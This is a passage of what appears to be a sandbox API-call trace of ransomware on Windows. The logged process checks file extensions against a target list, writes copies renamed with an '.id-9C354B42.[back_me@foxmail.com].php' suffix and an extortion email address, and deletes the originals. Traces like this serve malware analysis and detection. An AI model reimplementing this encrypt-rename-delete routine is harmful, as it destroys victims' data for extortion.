CloseHandle (hObject=0x214) returned 1 [0043.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0x20 [0043.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.315] lstrlenW (lpString=".doc") returned 4 [0043.315] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.315] lstrlenW (lpString=".docx") returned 5 [0043.315] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0043.315] lstrlenW (lpString=".pdf") returned 4 [0043.315] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.315] lstrlenW (lpString=".xls") returned 4 [0043.315] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.315] lstrlenW (lpString=".xlsx") returned 5 [0043.315] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0043.315] lstrlenW (lpString=".ppt") returned 4 [0043.315] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.315] lstrlenW (lpString=".zip") returned 4 [0043.316] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.316] lstrlenW (lpString=".rar") returned 4 [0043.316] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.316] lstrlenW (lpString=".bz2") returned 4 [0043.316] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.316] lstrlenW (lpString=".7z") returned 3 [0043.316] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.316] lstrlenW (lpString=".dbf") returned 4 [0043.316] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0043.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.316] lstrlenW (lpString=".1cd") returned 4 [0043.316] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0043.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.316] lstrlenW (lpString=".jpg") returned 4 [0043.316] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0043.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.316] lstrlenW (lpString=".doc") returned 4 [0043.316] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.316] lstrlenW (lpString=".docx") returned 5 [0043.316] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0043.316] lstrlenW (lpString=".pdf") returned 4 [0043.316] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.316] lstrlenW (lpString=".xls") returned 4 [0043.316] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.316] lstrlenW (lpString=".xlsx") returned 5 [0043.316] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0043.316] lstrlenW (lpString=".ppt") returned 4 [0043.316] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.316] lstrlenW (lpString=".zip") returned 4 [0043.316] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.316] lstrlenW (lpString=".rar") returned 4 [0043.316] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.317] lstrlenW (lpString=".bz2") returned 4 [0043.317] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.317] lstrlenW (lpString=".7z") returned 3 [0043.317] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.317] lstrlenW (lpString=".dbf") returned 4 [0043.317] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0043.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.317] lstrlenW (lpString=".1cd") returned 4 [0043.317] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0043.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0043.317] lstrlenW (lpString=".jpg") returned 4 [0043.317] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0043.317] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0043.317] lstrlenW (lpString="Graph.emf") returned 9 [0043.317] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.118] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=116724) returned 1 [0046.118] CloseHandle (hObject=0x1fc) returned 1 [0046.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf")) returned 0x20 [0046.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.119] lstrlenW (lpString=".doc") returned 4 [0046.119] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0046.119] lstrlenW (lpString=".docx") returned 5 [0046.119] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0046.119] lstrlenW (lpString=".pdf") returned 4 [0046.119] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0046.119] lstrlenW (lpString=".xls") returned 4 [0046.119] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0046.119] lstrlenW (lpString=".xlsx") returned 5 [0046.119] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0046.119] lstrlenW (lpString=".ppt") returned 4 [0046.119] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0046.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.119] lstrlenW (lpString=".zip") returned 4 [0046.119] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0046.119] lstrlenW (lpString=".rar") returned 4 [0046.119] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0046.119] lstrlenW (lpString=".bz2") returned 4 [0046.119] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0046.119] lstrlenW (lpString=".7z") returned 3 [0046.119] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0046.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.119] lstrlenW (lpString=".dbf") returned 4 [0046.119] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0046.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.119] lstrlenW (lpString=".1cd") returned 4 [0046.120] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0046.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.120] lstrlenW (lpString=".jpg") returned 4 [0046.120] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0046.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.120] lstrlenW (lpString=".doc") returned 4 [0046.120] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0046.120] lstrlenW (lpString=".docx") returned 5 [0046.120] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0046.120] lstrlenW (lpString=".pdf") returned 4 [0046.120] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0046.120] lstrlenW (lpString=".xls") returned 4 [0046.120] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0046.120] lstrlenW (lpString=".xlsx") returned 5 [0046.120] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0046.120] lstrlenW (lpString=".ppt") returned 4 [0046.120] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0046.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.120] lstrlenW (lpString=".zip") returned 4 [0046.120] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0046.120] lstrlenW (lpString=".rar") returned 4 [0046.120] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0046.120] lstrlenW (lpString=".bz2") returned 4 [0046.120] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0046.120] lstrlenW (lpString=".7z") returned 3 [0046.120] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0046.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.120] lstrlenW (lpString=".dbf") returned 4 [0046.120] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0046.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.120] lstrlenW (lpString=".1cd") returned 4 [0046.120] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0046.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0046.121] lstrlenW (lpString=".jpg") returned 4 [0046.121] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0046.121] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.121] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.538] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2181) returned 1 [0046.538] CloseHandle (hObject=0x214) returned 1 [0046.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 0x20 [0046.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.538] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.538] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.761] GetLastError () returned 0x0 [0046.761] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x885, lpOverlapped=0x0) returned 1 [0046.763] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x890, lpOverlapped=0x0) returned 1 [0046.763] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.764] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.764] SetEndOfFile (hFile=0x1b4) returned 1 [0046.764] CloseHandle (hObject=0x1b4) returned 1 [0046.764] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.764] SetEndOfFile (hFile=0x214) returned 1 [0046.765] CloseHandle (hObject=0x214) returned 1 [0046.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.765] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 1 [0046.765] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.765] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.765] lstrlenW (lpString=".doc") returned 4 [0046.765] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.765] lstrlenW (lpString=".docx") returned 5 [0046.765] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.765] lstrlenW (lpString=".pdf") returned 4 [0046.765] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.765] lstrlenW (lpString=".xls") returned 4 [0046.765] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.765] lstrlenW (lpString=".xlsx") returned 5 [0046.765] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.765] lstrlenW (lpString=".ppt") returned 4 [0046.765] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.766] lstrlenW (lpString=".zip") returned 4 [0046.766] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.766] lstrlenW (lpString=".rar") returned 4 [0046.766] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.766] lstrlenW (lpString=".bz2") returned 4 [0046.766] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.766] lstrlenW (lpString=".7z") returned 3 [0046.766] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.766] lstrlenW (lpString=".dbf") returned 4 [0046.766] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.766] lstrlenW (lpString=".1cd") returned 4 [0046.766] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.766] lstrlenW (lpString=".jpg") returned 4 [0046.766] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.766] lstrlenW (lpString=".doc") returned 4 [0046.766] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.766] lstrlenW (lpString=".docx") returned 5 [0046.766] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.766] lstrlenW (lpString=".pdf") returned 4 [0046.766] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.766] lstrlenW (lpString=".xls") returned 4 [0046.766] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.766] lstrlenW (lpString=".xlsx") returned 5 [0046.766] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.766] lstrlenW (lpString=".ppt") returned 4 [0046.766] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.767] lstrlenW (lpString=".zip") returned 4 [0046.767] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.767] lstrlenW (lpString=".rar") returned 4 [0046.767] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.767] lstrlenW (lpString=".bz2") returned 4 [0046.767] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.767] lstrlenW (lpString=".7z") returned 3 [0046.767] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.767] lstrlenW (lpString=".dbf") returned 4 [0046.767] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.767] lstrlenW (lpString=".1cd") returned 4 [0046.767] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0046.767] lstrlenW (lpString=".jpg") returned 4 [0046.767] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.767] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.767] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.768] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1293) returned 1 [0046.768] CloseHandle (hObject=0x214) returned 1 [0046.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 0x20 [0046.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.768] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.768] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.770] GetLastError () returned 0x0 [0046.770] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x50d, lpOverlapped=0x0) returned 1 [0046.771] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x510, lpOverlapped=0x0) returned 1 [0046.772] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.772] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.772] SetEndOfFile (hFile=0x1b4) returned 1 [0046.772] CloseHandle (hObject=0x1b4) returned 1 [0046.772] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.772] SetEndOfFile (hFile=0x214) returned 1 [0046.773] CloseHandle (hObject=0x214) returned 1 [0046.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.773] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 1 [0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.774] lstrlenW (lpString=".doc") returned 4 [0046.774] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.774] lstrlenW (lpString=".docx") returned 5 [0046.774] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.774] lstrlenW (lpString=".pdf") returned 4 [0046.774] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.774] lstrlenW (lpString=".xls") returned 4 [0046.774] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.774] lstrlenW (lpString=".xlsx") returned 5 [0046.774] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.774] lstrlenW (lpString=".ppt") returned 4 [0046.774] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.774] lstrlenW (lpString=".zip") returned 4 [0046.774] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.774] lstrlenW (lpString=".rar") returned 4 [0046.774] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.774] lstrlenW (lpString=".bz2") returned 4 [0046.774] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.774] lstrlenW (lpString=".7z") returned 3 [0046.774] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.774] lstrlenW (lpString=".dbf") returned 4 [0046.774] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.775] lstrlenW (lpString=".1cd") returned 4 [0046.775] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.775] lstrlenW (lpString=".jpg") returned 4 [0046.775] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0046.775] lstrlenW (lpString=".doc") returned 4 [0046.775] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.775] lstrlenW (lpString=".docx") returned 5 [0046.775] lstrcmpiW 